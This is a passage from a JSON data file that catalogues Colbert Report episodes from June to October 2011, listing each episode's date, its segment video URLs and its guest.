        "http://thecolbertreport.cc.com/videos/fe2wnr/sign-off---scented-box-cutter"
      ],
      "guest": "Grover Norquist"
    },
    {
      "date": "2011-06-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gs5b2y/intro---6-28-11",
        "http://thecolbertreport.cc.com/videos/im5by3/michele-bachmann-compares-herself-to-john-wayne",
        "http://thecolbertreport.cc.com/videos/b2dez1/the-word---too-big-to-nail",
        "http://thecolbertreport.cc.com/videos/eztgrx/advertising-to-monkeys",
        "http://thecolbertreport.cc.com/videos/jfztdi/alexandra-pelosi",
        "http://thecolbertreport.cc.com/videos/1it2j9/sign-off---teleprompter-eulogy"
      ],
      "guest": "Alexandra Pelosi"
    },
    {
      "date": "2011-06-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/e7dlbc/intro---6-29-11",
        "http://thecolbertreport.cc.com/videos/s3xttd/4th-of-july-under-attack---fireworks-cancelled",
        "http://thecolbertreport.cc.com/videos/7gul1z/colbert-super-pac---irresponsible-advertising",
        "http://thecolbertreport.cc.com/videos/kco7lo/colbert-super-pac---trevor-potter-preps-stephen-for-his-fec-hearing",
        "http://thecolbertreport.cc.com/videos/o7wrgl/hometown-hero-town---lexington--ky",
        "http://thecolbertreport.cc.com/videos/zc23xv/gary-sinise",
        "http://thecolbertreport.cc.com/videos/80a7v2/sign-off---see-you-at-the-fec"
      ],
      "guest": "Gary Sinise"
    },
    {
      "date": "2011-06-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3yk8uf/intro---6-30-11",
        "http://thecolbertreport.cc.com/videos/gffis7/colbert-super-pac---i-can-haz-super-pac-",
        "http://thecolbertreport.cc.com/videos/uf525x/colbert-super-pac---stephen-addresses-colbert-super-nation",
        "http://thecolbertreport.cc.com/videos/owodco/formidable-opponent---pakistan",
        "http://thecolbertreport.cc.com/videos/807lhi/timothy-garton-ash",
        "http://thecolbertreport.cc.com/videos/b2dqnd/sign-off---super-pac-donations"
      ],
      "guest": "Timothy Garton Ash"
    },
    {
      "date": "2011-07-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t8xnmj/intro---7-11-11",
        "http://thecolbertreport.cc.com/videos/sgqex9/colbert-super-pac---pushing-the-limits",
        "http://thecolbertreport.cc.com/videos/m3svek/anti-frack-attacks",
        "http://thecolbertreport.cc.com/videos/2h3oe2/tip-wag---conservative-john-lennon---unfunny-germany",
        "http://thecolbertreport.cc.com/videos/z2r2b0/michael-shermer",
        "http://thecolbertreport.cc.com/videos/g47pr3/sign-off---super-pac-fundraising-goal"
      ],
      "guest": "Michael Shermer"
    },
    {
      "date": "2011-07-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/20gpt7/herman-cain-train",
        "http://thecolbertreport.cc.com/videos/7aive1/the-family-leader-s-controversial-pledge",
        "http://thecolbertreport.cc.com/videos/7sobpk/heterosexual-accountability-buddy",
        "http://thecolbertreport.cc.com/videos/vw4tol/dan-savage",
        "http://thecolbertreport.cc.com/videos/nkuukl/sign-off---fixing-the-boiler"
      ],
      "guest": "Dan Savage"
    },
    {
      "date": "2011-07-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/smsyco/intro---7-13-11",
        "http://thecolbertreport.cc.com/videos/70lgql/flagworth-2012",
        "http://thecolbertreport.cc.com/videos/7gb5kn/republicans-choose-none-of-the-above",
        "http://thecolbertreport.cc.com/videos/palj9t/obama-calls-the-republican-bluff",
        "http://thecolbertreport.cc.com/videos/5ulzg5/david-mccullough",
        "http://thecolbertreport.cc.com/videos/7xngpa/sign-off---pen-toss"
      ],
      "guest": "David McCullough"
    },
    {
      "date": "2011-07-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h2i0g7/intro---7-14-11",
        "http://thecolbertreport.cc.com/videos/8oisqi/carmageddon",
        "http://thecolbertreport.cc.com/videos/uqj8qb/may-the-best-stephen-colbert-win",
        "http://thecolbertreport.cc.com/videos/a29405/murdoch-s-media-empire-might-go-down-the-toilet",
        "http://thecolbertreport.cc.com/videos/1o1flh/improvised-expressive-devices",
        "http://thecolbertreport.cc.com/videos/82ovjs/jose-antonio-vargas",
        "http://thecolbertreport.cc.com/videos/9nwz4n/sign-off---goodnight"
      ],
      "guest": "Jose Antonio Vargas"
    },
    {
      "date": "2011-07-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ureory/intro---7-18-11",
        "http://thecolbertreport.cc.com/videos/ybue54/epic-blockbuster",
        "http://thecolbertreport.cc.com/videos/7t9e81/colbert-super-pac---cash-crawl",
        "http://thecolbertreport.cc.com/videos/73lwqj/colbert-super-pac---campaign-finance",
        "http://thecolbertreport.cc.com/videos/9q309t/blood-in-the-water---rupert-murdoch-s-news-of-the-world-scandal",
        "http://thecolbertreport.cc.com/videos/36812w/john-prendergast",
        "http://thecolbertreport.cc.com/videos/d8rt51/sign-off---prerecorded-episodes"
      ],
      "guest": "John Prendergast"
    },
    {
      "date": "2011-07-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bcunwj/newt-s-white-whale",
        "http://thecolbertreport.cc.com/videos/nhl043/god-calls-rick-perry",
        "http://thecolbertreport.cc.com/videos/6cdpui/debt-ceiling-deadline-conspiracy",
        "http://thecolbertreport.cc.com/videos/maophz/david-carr",
        "http://thecolbertreport.cc.com/videos/50pek1/sign-off---goodnight"
      ],
      "guest": "David Carr"
    },
    {
      "date": "2011-07-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pmh9y8/humanized-by-pie",
        "http://thecolbertreport.cc.com/videos/ozixqy/voter-id-laws",
        "http://thecolbertreport.cc.com/videos/2i29ww/congressional-partisan-rancor",
        "http://thecolbertreport.cc.com/videos/2p2ijk/michael-sandel",
        "http://thecolbertreport.cc.com/videos/tia7kd/sign-off---reading"
      ],
      "guest": "Michael Sandel"
    },
    {
      "date": "2011-07-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/egjics/intro---7-21-11",
        "http://thecolbertreport.cc.com/videos/l3rcr1/death-of-america-s-space-program",
        "http://thecolbertreport.cc.com/videos/vntv81/i-s-on-edjukashun---gay-history---disney-english",
        "http://thecolbertreport.cc.com/videos/6yym31/nbc--no-butt-coverage",
        "http://thecolbertreport.cc.com/videos/9catel/david-eagleman",
        "http://thecolbertreport.cc.com/videos/nn8qoh/sign-off---space-robot"
      ],
      "guest": "David Eagleman"
    },
    {
      "date": "2011-07-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/l0wxhe/y2-gay",
        "http://thecolbertreport.cc.com/videos/fbd6kf/norwegian-muslish-gunman-s-islam-esque-atrocity",
        "http://thecolbertreport.cc.com/videos/wznkdz/vaginal-puppeteering-vs--d--k-scrub",
        "http://thecolbertreport.cc.com/videos/z4gfkc/brian-cox",
        "http://thecolbertreport.cc.com/videos/9q5n38/sign-off---the-thinker"
      ],
      "guest": "Brian Cox"
    },
    {
      "date": "2011-07-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bzl0xh/intro---7-26-11",
        "http://thecolbertreport.cc.com/videos/umjv5s/herman-cain-cancels-on-stephen",
        "http://thecolbertreport.cc.com/videos/zq2rpw/-poor--in-america",
        "http://thecolbertreport.cc.com/videos/j2gcnk/-poor--in-america---peter-edelman",
        "http://thecolbertreport.cc.com/videos/a4awyb/america-s-bucket-list",
        "http://thecolbertreport.cc.com/videos/azl59v/brooke-gladstone",
        "http://thecolbertreport.cc.com/videos/ly4qfz/sign-off---america-s-bucket-list"
      ],
      "guest": "Brooke Gladstone"
    },
    {
      "date": "2011-07-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zq1omv/nissan-s--leaf-wave--deadline",
        "http://thecolbertreport.cc.com/videos/x50fvb/difference-makers---patrick-rodgers",
        "http://thecolbertreport.cc.com/videos/3o44r7/helium-runs-out",
        "http://thecolbertreport.cc.com/videos/omkngv/missy-cummings",
        "http://thecolbertreport.cc.com/videos/y4zc9o/sign-off---surveillance-drone-crash"
      ],
      "guest": "Mary \"Missy\" Cummings"
    },
    {
      "date": "2011-07-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/8c1oeo/the-republican-ring-of-power",
        "http://thecolbertreport.cc.com/videos/yzmsiz/colbert-super-pac---for-the-children",
        "http://thecolbertreport.cc.com/videos/e4r2vc/colbert-super-pac---matthew-dowd---ham-rove",
        "http://thecolbertreport.cc.com/videos/z6f8m4/buddy-roemer-pt--1",
        "http://thecolbertreport.cc.com/videos/n4ldiq/buddy-roemer-pt--2",
        "http://thecolbertreport.cc.com/videos/tzpdu5/sign-off---cone-of-silence"
      ],
      "guest": "Buddy Roemer"
    },
    {
      "date": "2011-08-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/aqw9op/intro---8-1-11",
        "http://thecolbertreport.cc.com/videos/lrz1ud/-three-billy-goats-gruff--budget-negotiations",
        "http://thecolbertreport.cc.com/videos/mgkqu6/the-word---with-great-power-comes-no-responsibility",
        "http://thecolbertreport.cc.com/videos/6v3oa3/from-ashes-to-bullets",
        "http://thecolbertreport.cc.com/videos/mqbxt0/tony-hsieh",
        "http://thecolbertreport.cc.com/videos/sqd53z/sign-off---sneakers"
      ],
      "guest": "Tony Hsieh"
    },
    {
      "date": "2011-08-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xaqx6o/intro---8-2-11",
        "http://thecolbertreport.cc.com/videos/j862uf/newt-gingrich-s-twitter-scandal",
        "http://thecolbertreport.cc.com/videos/pzfcj1/america-s-credit-grating",
        "http://thecolbertreport.cc.com/videos/y1xqdj/america-s-credit-grating---david-leonhardt",
        "http://thecolbertreport.cc.com/videos/gg2p1r/baby-teeth-economy",
        "http://thecolbertreport.cc.com/videos/id20x6/al-hunt",
        "http://thecolbertreport.cc.com/videos/h26uru/sign-off---goodnight"
      ],
      "guest": "Al Hunt"
    },
    {
      "date": "2011-08-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/br7gdf/intro---8-3-11",
        "http://thecolbertreport.cc.com/videos/3i1326/multiracial-spider-man",
        "http://thecolbertreport.cc.com/videos/f3w320/threatdown---fake-states--sharia-weather---monopoly",
        "http://thecolbertreport.cc.com/videos/cvc16w/women-s-health-nazi-plan",
        "http://thecolbertreport.cc.com/videos/6x0m3y/robert-wittman",
        "http://thecolbertreport.cc.com/videos/utsxoh/sign-off---official-flag-updater"
      ],
      "guest": "Robert Wittman"
    },
    {
      "date": "2011-08-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t3bxny/intro---8-4-11",
        "http://thecolbertreport.cc.com/videos/8tx5s2/barack-obama-s-50th-birthday",
        "http://thecolbertreport.cc.com/videos/7ahjkr/colbert-super-pac---the-heroes-respond",
        "http://thecolbertreport.cc.com/videos/ma6ejy/wisconsin-s-recall-election---americans-for-prosperity-s-absentee-ballot-typos",
        "http://thecolbertreport.cc.com/videos/8q9pe2/sport-report---baseball-s-lowest-records---mlb-s-twitter-feed",
        "http://thecolbertreport.cc.com/videos/d8704f/anthony-bourdain",
        "http://thecolbertreport.cc.com/videos/afj5qe/sign-off---goodnight"
      ],
      "guest": "Anthony Bourdain"
    },
    {
      "date": "2011-08-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/smerqo/america-s-credit-downgrade",
        "http://thecolbertreport.cc.com/videos/y7x3es/colbert-super-pac---rick-perry-for-president",
        "http://thecolbertreport.cc.com/videos/lu1v74/doomsday-bargain-bunkers",
        "http://thecolbertreport.cc.com/videos/wkairk/nassir-ghaemi",
        "http://thecolbertreport.cc.com/videos/4zkkn5/sign-off---stephen-sniffs-a-marker"
      ],
      "guest": "Nassir Ghaemi"
    },
    {
      "date": "2011-08-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tufpnm/intro---8-9-11",
        "http://thecolbertreport.cc.com/videos/pxptx8/heatsteria",
        "http://thecolbertreport.cc.com/videos/rtqznl/the-word---head-in-the-cloud",
        "http://thecolbertreport.cc.com/videos/gj6vb5/ric-ocasek"
      ],
      "guest": "The Cars"
    },
    {
      "date": "2011-08-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mjvryb/intro---8-10-11",
        "http://thecolbertreport.cc.com/videos/1jlwac/hooker-drawer-market",
        "http://thecolbertreport.cc.com/videos/cw4el2/yahweh-or-no-way---mormons---god-s-poll-numbers",
        "http://thecolbertreport.cc.com/videos/uulxb3/god-s-job-performance---jim-martin",
        "http://thecolbertreport.cc.com/videos/15zleh/colbert-super-pac---campaign-donation-addiction",
        "http://thecolbertreport.cc.com/videos/zxka8u/elliot-ackerman",
        "http://thecolbertreport.cc.com/videos/mvgmwy/sign-off---e-mailing-colbert-nation"
      ],
      "guest": "Elliott Ackerman"
    },
    {
      "date": "2011-08-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pi19ix/super-pac-ad---behind-the-green-corn",
        "http://thecolbertreport.cc.com/videos/x1aodj/super-pac-ad---episode-iv--a-new-hope",
        "http://thecolbertreport.cc.com/videos/etbj36/romney-2012----corporations-are-people-",
        "http://thecolbertreport.cc.com/videos/90ptp7/colbert-super-pac---rick-parry-with-an--a--for-america",
        "http://thecolbertreport.cc.com/videos/swbu9s/colbert-super-pac---confused-by-rick-parry-with-an--a--for-america",
        "http://thecolbertreport.cc.com/videos/yu257u/gloria-steinem",
        "http://thecolbertreport.cc.com/videos/7x3ryp/sign-off---stephen-s-emmy-award"
      ],
      "guest": "Gloria Steinem"
    },
    {
      "date": "2011-08-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/40fotx/exclusive---susan-rice-extended-interview-pt--1",
        "http://thecolbertreport.cc.com/videos/vvlrva/exclusive---susan-rice-extended-interview-pt--2",
        "http://thecolbertreport.cc.com/videos/lqjncy/susan-rice-extended-interview-pt--3",
        "http://thecolbertreport.cc.com/videos/0yyo1z/colbert-super-pac---stephen-apologizes-to-woi-in-des-moines",
        "http://thecolbertreport.cc.com/videos/dzchwi/colbert-super-pac---iowa-straw-poll-results",
        "http://thecolbertreport.cc.com/videos/dkh4ps/susan-rice-pt--1",
        "http://thecolbertreport.cc.com/videos/nla0b4/susan-rice-pt--2",
        "http://thecolbertreport.cc.com/videos/1rtsq5/sign-off---full-susan-rice-interview-online"
      ],
      "guest": "Amb. Susan Rice"
    },
    {
      "date": "2011-08-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/i0nwuy/exclusive---space-shuttle-atlantis-crew---extended-interview-pt--1",
        "http://thecolbertreport.cc.com/videos/8gjrx4/exclusive---space-shuttle-atlantis-crew---extended-interview-pt--2",
        "http://thecolbertreport.cc.com/videos/rmrfc3/the-etymology-of--obamacare-",
        "http://thecolbertreport.cc.com/videos/cjfda6/colbert-super-pac---persuadulux-6000",
        "http://thecolbertreport.cc.com/videos/m00z1i/colbert-super-pac---frank-luntz-commits-to-the-pac",
        "http://thecolbertreport.cc.com/videos/a8v2gy/nasa-s-greatest-moments-montage",
        "http://thecolbertreport.cc.com/videos/nnfhdg/chris-ferguson--doug-hurley--rex-walheim---sandy-magnus",
        "http://thecolbertreport.cc.com/videos/h83o7v/sign-off---stephen-s-launch-pad-nut"
      ],
      "guest": "STS-135 astronauts"
    },
    {
      "date": "2011-08-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/brmz0s/exclusive---jeff-bridges-for-summer-s-eve",
        "http://thecolbertreport.cc.com/videos/1cvtnm/intro---8-17-11",
        "http://thecolbertreport.cc.com/videos/yk47i3/colbert-super-pac---rick-perry-s-treasurer",
        "http://thecolbertreport.cc.com/videos/uiim37/tip-wag---evangelical-scientists---rick-santorum",
        "http://thecolbertreport.cc.com/videos/4km5oi/jeff-bridges",
        "http://thecolbertreport.cc.com/videos/1bb0sg/sign-off---jeff-bridges--album-cover"
      ],
      "guest": "Jeff Bridges"
    },
    {
      "date": "2011-08-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/237rh7/intro---8-18-11",
        "http://thecolbertreport.cc.com/videos/oqd808/russia-s-james-bonds-vs--america-s-barack-obama",
        "http://thecolbertreport.cc.com/videos/j31bbb/colbert-super-pac---parry-with-an-a-gate----day-6---we-may-have-did-it-",
        "http://thecolbertreport.cc.com/videos/94c0x7/colbert-super-pac---parry-with-an-a-gate----day-6---woi-in-des-moines-reports",
        "http://thecolbertreport.cc.com/videos/ger41z/anderson-cooper-s-kryptonite",
        "http://thecolbertreport.cc.com/videos/1yhudu/kevin-mitnick",
        "http://thecolbertreport.cc.com/videos/5r0lwc/sign-off---woi-in-des-moines"
      ],
      "guest": "Kevin Mitnick"
    },
    {
      "date": "2011-09-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s3kv9p/michele-bachmann-s-natural-disaster-metaphor",
        "http://thecolbertreport.cc.com/videos/fk34r7/the-word---happy-endings",
        "http://thecolbertreport.cc.com/videos/ovw3t4/cheating-death---placebocisers---vaxamalgam",
        "http://thecolbertreport.cc.com/videos/1cua0e/tim-pawlenty",
        "http://thecolbertreport.cc.com/videos/d2roue/sign-off---placebocisers"
      ],
      "guest": "Gov. Tim Pawlenty"
    },
    {
      "date": "2011-09-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1iqy2m/intro---9-7-11",
        "http://thecolbertreport.cc.com/videos/nw0vtw/this-weak-in-national-secowardty",
        "http://thecolbertreport.cc.com/videos/dhg1or/martin-luther-king-jr--memorial-paraphrase",
        "http://thecolbertreport.cc.com/videos/796niz/parry-with-an-a-gate----day-26---update",
        "http://thecolbertreport.cc.com/videos/h8ndj7/robin-wright",
        "http://thecolbertreport.cc.com/videos/we0bnb/sign-off---stephen-uses-his-ipad"
      ],
      "guest": "Robin B. Wright"
    },
    {
      "date": "2011-09-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6ut02o/republican-presidential-debate-media-coverage",
        "http://thecolbertreport.cc.com/videos/0yghln/rick-perry-presents",
        "http://thecolbertreport.cc.com/videos/pf00vn/barack-obama-s-jobs-speech",
        "http://thecolbertreport.cc.com/videos/5x0a3c/tom-brokaw",
        "http://thecolbertreport.cc.com/videos/lwsx3m/sign-off---old-milwaukee-beer"
      ],
      "guest": "Tom Brokaw"
    },
    {
      "date": "2011-09-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ooncl/tea-party-face-off-preview",
        "http://thecolbertreport.cc.com/videos/4ig8mh/stephen-reports-on-an-old-fashioned-hero",
        "http://thecolbertreport.cc.com/videos/eicjwv/shopping-griefportunities",
        "http://thecolbertreport.cc.com/videos/sxy47f/diane-sawyer",
        "http://thecolbertreport.cc.com/videos/g2jfq9/sign-off---stephen-s-mug"
      ],
      "guest": "Diane Sawyer"
    },
    {
      "date": "2011-09-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bgo24q/intro---9-13-11",
        "http://thecolbertreport.cc.com/videos/6jpgl3/cnn-tea-party-republican-debate",
        "http://thecolbertreport.cc.com/videos/swyrcg/barack-obama-s-american-jobs-act",
        "http://thecolbertreport.cc.com/videos/q1hw3n/barack-obama-s-american-jobs-act---paul-krugman",
        "http://thecolbertreport.cc.com/videos/t7gpb8/ron-paul-2012",
        "http://thecolbertreport.cc.com/videos/2cr39e/al-gore",
        "http://thecolbertreport.cc.com/videos/e1gewo/sign-off----stephen-colbert-"
      ],
      "guest": "Al Gore"
    },
    {
      "date": "2011-09-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/thyhg7/jobs-bill-clipgate",
        "http://thecolbertreport.cc.com/videos/gvt0ij/return-to-sender",
        "http://thecolbertreport.cc.com/videos/3h08e2/return-to-sender---phil-rubio",
        "http://thecolbertreport.cc.com/videos/gz48mn/rick-perry-s-hpv-vaccine-mandate",
        "http://thecolbertreport.cc.com/videos/dx27ks/michael-moore",
        "http://thecolbertreport.cc.com/videos/3rxw2x/sign-off---goodnight"
      ],
      "guest": "Michael Moore"
    },
    {
      "date": "2011-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jgxmci/intro---9-15-11",
        "http://thecolbertreport.cc.com/videos/rte3k7/take-a-billion--leave-a-billion",
        "http://thecolbertreport.cc.com/videos/15vhbi/the-other-american-jobs-act",
        "http://thecolbertreport.cc.com/videos/rje3k2/jimmy-fallon---stephen-reminisce",
        "http://thecolbertreport.cc.com/videos/h90n13/fema-s-waffle-house-index",
        "http://thecolbertreport.cc.com/videos/b406bd/david-copperfield",
        "http://thecolbertreport.cc.com/videos/7m5lpn/sign-off---stephen-s-magic-trick"
      ],
      "guest": "David Copperfield"
    },
    {
      "date": "2011-09-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tpoc1g/the-63rd-emmy-awards",
        "http://thecolbertreport.cc.com/videos/whouap/barack-obama-unveils-the--buffett-rule-",
        "http://thecolbertreport.cc.com/videos/pyq49u/the-word---death-and-taxes",
        "http://thecolbertreport.cc.com/videos/3q875w/the-gayest-penetration",
        "http://thecolbertreport.cc.com/videos/xnvm51/jeffrey-kluger",
        "http://thecolbertreport.cc.com/videos/t0vjb4/sign-off---colbert-nation-s-newest-members"
      ],
      "guest": "Jeffrey Kluger"
    },
    {
      "date": "2011-09-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hc8ova/intro---9-21-11",
        "http://thecolbertreport.cc.com/videos/negwpt/coming-soon---hour-long-radiohead-special",
        "http://thecolbertreport.cc.com/videos/kyxdz3/european-union-collapse---war-fueled-recovery",
        "http://thecolbertreport.cc.com/videos/t51ow7/european-union-collapse---war-fueled-recovery---chrystia-freeland",
        "http://thecolbertreport.cc.com/videos/wvyk91/wall-street-under-siege",
        "http://thecolbertreport.cc.com/videos/z0celp/daniel-yergin",
        "http://thecolbertreport.cc.com/videos/y9o1cm/sign-off---cigar"
      ],
      "guest": "Daniel Yergin"
    },
    {
      "date": "2011-09-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9dc7h4/defunct-satellite-hurtles-toward-earth",
        "http://thecolbertreport.cc.com/videos/szcqls/tip-wag---marine-corps---department-of-homeland-security",
        "http://thecolbertreport.cc.com/videos/6uyhy5/obama-s-u-n--gaffes---rick-perry-s-support-for-israel",
        "http://thecolbertreport.cc.com/videos/ncny69/jeremy-ben-ami",
        "http://thecolbertreport.cc.com/videos/akoxfi/sign-off---the-beloved-dog-lives-on"
      ],
      "guest": "Jeremy Ben-Ami"
    },
    {
      "date": "2011-09-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1w32i4/intro---9-26-11",
        "http://thecolbertreport.cc.com/videos/p9c0ds/dr-pepper-presents-stephen-colbert-s-rocktember-with-radiohead",
        "http://thecolbertreport.cc.com/videos/u4qbft/the-word---i-think--therefore-i-brand",
        "http://thecolbertreport.cc.com/videos/grlcgn/radiohead",
        "http://thecolbertreport.cc.com/videos/xqeu3w/ignoring-global-warming",
        "http://thecolbertreport.cc.com/videos/wwvu7o/ignoring-global-warming---thom-yorke---ed-o-brien"
      ],
      "guest": "Radiohead"
    },
    {
      "date": "2011-09-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9qb4vy/stephen---melinda-gates-foundation---donorschoose-org",
        "http://thecolbertreport.cc.com/videos/tsm4sg/rick-perry-s-debate-gaffe---arizona-s-primary-date",
        "http://thecolbertreport.cc.com/videos/5mvmay/sport-report---nascar-s-green-initiatives---nfl-pat-downs",
        "http://thecolbertreport.cc.com/videos/ptxagr/melinda-gates",
        "http://thecolbertreport.cc.com/videos/zlthc8/sign-off---beer-from-the-beerkenstocks"
      ],
      "guest": "Melinda Gates"
    },
    {
      "date": "2011-09-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3qibl4/intro---9-28-11",
        "http://thecolbertreport.cc.com/videos/udzuyb/george-clooney-s-villa-parties",
        "http://thecolbertreport.cc.com/videos/tbuq71/the-word---labor-chains",
        "http://thecolbertreport.cc.com/videos/3qmkez/atone-phone---john-lithgow-calls",
        "http://thecolbertreport.cc.com/videos/ndmtp9/ken-burns",
        "http://thecolbertreport.cc.com/videos/osmia6/sign-off---reading---shofar-playing"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2011-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0agwtq/mark-cuban-dances",
        "http://thecolbertreport.cc.com/videos/ivvzeu/colbert-super-pac---ham-rove-s-secrets",
        "http://thecolbertreport.cc.com/videos/3yzu4u/colbert-super-pac---trevor-potter---stephen-s-shell-corporation",
        "http://thecolbertreport.cc.com/videos/ujyuht/colbert-super-pac-shh----the-donating-game",
        "http://thecolbertreport.cc.com/videos/qiwg3k/mark-cuban",
        "http://thecolbertreport.cc.com/videos/8ekdsc/sign-off---last-heroe--crawl"
      ],
      "guest": "Mark Cuban"
    },
    {
      "date": "2011-10-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/fehwjq/rick-perry-s-questionably-named-hunting-camp",
        "http://thecolbertreport.cc.com/videos/m272fc/supreme-courting-season",
        "http://thecolbertreport.cc.com/videos/v2njjc/supreme-courting-season---jeffrey-toobin",
        "http://thecolbertreport.cc.com/videos/25ffk2/threatdown---bears-in-rehab--bear-terminators---sanctimonious-enviro-bears",
        "http://thecolbertreport.cc.com/videos/wmazj5/jerome-groopman",
        "http://thecolbertreport.cc.com/videos/kp6658/sign-off---stephen-s-water-bottle"
      ],
      "guest": "Jerome Groopman"
    },
    {
      "date": "2011-10-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wy82eg/intro---10-4-11",
        "http://thecolbertreport.cc.com/videos/3wq74s/chris-christie-2012",
        "http://thecolbertreport.cc.com/videos/3dpzet/chris-christie-2012---rick-davis",
        "http://thecolbertreport.cc.com/videos/cwuy2m/bocephus-s-eternal-question",
        "http://thecolbertreport.cc.com/videos/xhc68w/john-lithgow",
        "http://thecolbertreport.cc.com/videos/n16lxn/sign-off---formula-401-rumors"
      ],
      "guest": "John Lithgow"
    },
    {
      "date": "2011-10-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0vn7mh/intro---10-5-11",
        "http://thecolbertreport.cc.com/videos/xnxfq5/herman-cain-2012",
        "http://thecolbertreport.cc.com/videos/dbbjic/herman-cain-2012---gay-choice",
        "http://thecolbertreport.cc.com/videos/6kkk93/tip-wag---mexico-city-marriage-licenses---modern-warfare-3-s-xp-promotion",
        "http://thecolbertreport.cc.com/videos/ifegp7/talib-kweli---yasiin-bey--a-k-a--mos-def-",
        "http://thecolbertreport.cc.com/videos/7edjef/sign-off---iphone-goodnight"
      ],
      "guest": "Mos Def &amp; Talib Kweli"
    },
    {
      "date": "2011-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/0qyxlz/colbert-super-pac-ad---foul-balls",
        "http://thecolbertreport.cc.com/videos/fri8e1/intro---10-6-11",
        "http://thecolbertreport.cc.com/videos/z103m6/sarah-palin-s-sad-news",
        "http://thecolbertreport.cc.com/videos/yarfv2/colbert-super-pac-shh----apology-to-ham-rove",
        "http://thecolbertreport.cc.com/videos/fottda/tribute-to-steve-jobs",
        "http://thecolbertreport.cc.com/videos/98xl59/jason-amerine",
        "http://thecolbertreport.cc.com/videos/oy1k9u/sign-off---goodnight"
      ],
      "guest": "Jason Amerine"
    },
    {
      "date": "2011-10-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nng5h7/exclusive---harry-belafonte-extended-interview",
        "http://thecolbertreport.cc.com/videos/gj3y6l/occupy-wall-street-spreads",
        "http://thecolbertreport.cc.com/videos/z27tp0/the-word---look-out-for-the-little-guy",
        "http://thecolbertreport.cc.com/videos/6vl2zq/sport-report---nba-lockout---colbert-super-pac-ad",
        "http://thecolbertreport.cc.com/videos/01fxlb/harry-belafonte",
        "http://thecolbertreport.cc.com/videos/s0qu24/sign-off---goodnight"
      ],
      "guest": "Harry Belafonte"
    },
    {
      "date": "2011-10-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/h40j2n/talking-iphone-4s",
        "http://thecolbertreport.cc.com/videos/ta7e7u/herman-cain-s-electrified-fence",
        "http://thecolbertreport.cc.com/videos/cbwqbb/thought-for-food---school-potato-guidelines---fast-food-stamps",
        "http://thecolbertreport.cc.com/videos/3h8h2l/steven-pinker",
        "http://thecolbertreport.cc.com/videos/9c1bsf/sign-off---sixth-anniversary-portrait"
      ],
      "guest": "Steven Pinker"
    },
    {
      "date": "2011-10-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iirczx/intro---10-19-11",
        "http://thecolbertreport.cc.com/videos/gghhza/herman-cain-canes-the-unemployed",
        "http://thecolbertreport.cc.com/videos/ubi151/job-killing-epa",
        "http://thecolbertreport.cc.com/videos/zi48pt/job-killing-epa---carol-browner",
        "http://thecolbertreport.cc.com/videos/f49qpp/rush-limbaugh-s-l-r-a--research",
        "http://thecolbertreport.cc.com/videos/fztuzs/ali-soufan",
        "http://thecolbertreport.cc.com/videos/kodm5a/sign-off---laptop-music"
      ],
      "guest": "Ali Soufan"
    },
    {
      "date": "2011-10-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n73wq4/intro---10-20-11",
        "http://thecolbertreport.cc.com/videos/5p2a33/goodbye--muammar-al-gaddafi",
        "http://thecolbertreport.cc.com/videos/5xgc3k/tip-wag---tea-party-nation-pledge---spirit-airlines--ad-revenue",
        "http://thecolbertreport.cc.com/videos/ql433h/bill-o-reilly-s--pinheads---patriots-",
        "http://thecolbertreport.cc.com/videos/qw2pao/chris-martin"
      ],
      "guest": "Coldplay"
    },
    {
      "date": "2011-10-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/x027jm/exclusive---colbert-super-pac---frank-luntz---stephen-knows-his-classic-rock",
        "http://thecolbertreport.cc.com/videos/f8t1zf/america-s-top-mormons---jon-huntsman",
        "http://thecolbertreport.cc.com/videos/45wqla/colbert-super-pac----corporations-are-people-",
        "http://thecolbertreport.cc.com/videos/6s8sdq/colbert-super-pac----corporations-are-people----frank-luntz",
